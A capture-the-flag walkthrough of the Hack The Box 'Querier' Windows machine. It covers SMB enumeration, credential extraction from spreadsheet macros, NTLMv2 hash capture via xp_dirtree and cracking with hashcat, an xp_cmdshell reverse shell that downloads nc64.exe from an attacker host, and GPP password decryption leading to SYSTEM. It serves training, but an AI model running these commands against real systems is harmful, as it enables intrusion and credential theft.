Querier HTB

IP

10.10.10.125    

Nmap scan

sudo nmap -sV -sC -A -oA namp_results 10.10.10.125

we have the following ports open

• 135: RPC

• 139: NetBIOS

• 445: SMB

• 1433: Mssql

Let's start with SMB enumeration

SMB

let's see if we can find any shares as an anonymous user.

smbclient -L \\\\10.10.10.125 -U "anonymous"

Looks like we have a share "report" lets mount to the drive and have a closer look

mkdir mount
sudo mount -t cifs -o username=anonymous //10.10.10.125/Reports mount

Looking through the share "report" we do see a document, lets copy it onto our machine

When we try to open the document through LibreOffice we are warned that the file contains macros.

What we can do is press okay and continue to open the xlsm file within LibreOffice go to Tools → Macros → Edit Macros.

we should be bought to the following page.

we can see we have a set of Mssql credentials.

QUERIER reporting PcwTWTHRwryjc$c6

• Quick tip xlsm, xlsx, docx are just zip archives, therefore we can decompress them.

Mssql

Since we have a set of Msql credentials, let's try and connect to the server.

impacket-mssqlclient -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125

• reporting doesn’t have required privs/permissions to establish a ‘xp_cmdshell’

We can most likely capture some credentials

We can use impacket to capture the NTLMv2-SSP hash, first lets setup our smb server

impacket-smbserver -smb2support creds /Impacket

then from our Mssql client we can use xp_dirtree to try and retrieve a file from our impacket smb server

xp_dirtree "\\10.10.16.4\creds",1, 1

Once there is a connection established, we can see we captured the NTLMv2-SSP hash

mssql-svc::QUERIER:4aae94a03c8616b0:4F3EE1AE2B23F5A6A467497B7DA0039E:010100000000000080675ABE3AC1D9017856BA80532BD0C6000000000200080042004F004A004E0001001E00570049004E002D004300460045003100550037005300490030003600340004003400570049004E002D00430046004500310055003700530049003000360034002E0042004F004A004E002E004C004F00430041004C000300140042004F004A004E002E004C004F00430041004C000500140042004F004A004E002E004C004F00430041004C000700080080675ABE3AC1D90106000400020000000800300030000000000000000000000000300000AF74B77FF1809498BBCF978D656F9AAFFB86F5F579FA36A93741735315EF3CD00A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003400000000000000000000000000

Let's use Hashcat to crack the hash

first, we need to find the hash mode for Hashcat

hashcat -h | grep NTLMv2

Now lets crack it

hashcat -m 5600 -a 0 mssql_hash.txt /usr/share/wordlists/rockyou.txt

corporate568

Now that we have Mssql password let's attempt an xp_cmdshell first let's use impacket-mssqlclient and test our credentials

impacket-mssqlclient -windows-auth querier/mssql-svc:corporate568@10.10.10.125

we need to enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE

Our next goal is to establish a reverse shell on the target machine we need to

1. Download nc64.exe onto the system

2. Run nc64.exe to connect back to our netcat listener

Move nc64.exe into your working directory.

Now we can set up a smb server to grab our nc64.exe.

impacket-smbserver -smb2support grab ./

Now from our xp_cmdshell

xp_cmdshell esentutl.exe /y \\10.10.16.4\grab\nc64.exe /d C:\Users\mssql-svc\nc64.exe /o

Now we have nc64.exe on our target machine we can start our netcat listener.

nc -lvnp 9005

From our xp_cmdshell lets run nc64.exe and connect to our listener.

xp_cmdshell C:\Users\mssql-svc\nc64.exe -e cmd 10.10.16.4 9005

we now have a reverse shell on the system.

Privilege Escalation via mssql-svc

First Lets get some system information and run it through wes-ng

systeminfo

systeminfo

Host Name:                 QUERIER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA073
Original Install Date:     1/28/2019, 11:16:50 PM
System Boot Time:          7/28/2023, 1:29:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,803 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 4,060 MB
Virtual Memory: In Use:    1,443 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB.LOCAL
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4481031
                           [02]: KB4470788
                           [03]: KB4480056
                           [04]: KB4480979
                           [05]: KB4476976
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.125
                                 [02]: fe80::a84c:d63a:3dcd:5749
                                 [03]: dead:beef::a84c:d63a:3dcd:5749
                                 [04]: dead:beef::150
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Copy and paste the output to our local machine and run it through wes-ng

/opt/wesng/wes.py --update
/opt/wesng/wes.py systeminfo.txt

• no luck

if we refer to https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation specifically cached GPP(Group Policy Preferences) Password, within the

C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>

we can find a file "Groups.xml" if we look at the file.

• we find a encrypted password, we can use gpp-decrypt to decrypt the password

gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ

We get the password

MyUnclesAreMarioAndLuigi!!1!

From here we can use impacket-psexec to get a shell on the system as the Administrator

impacket-psexec QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

We now have a shell as nt authority\system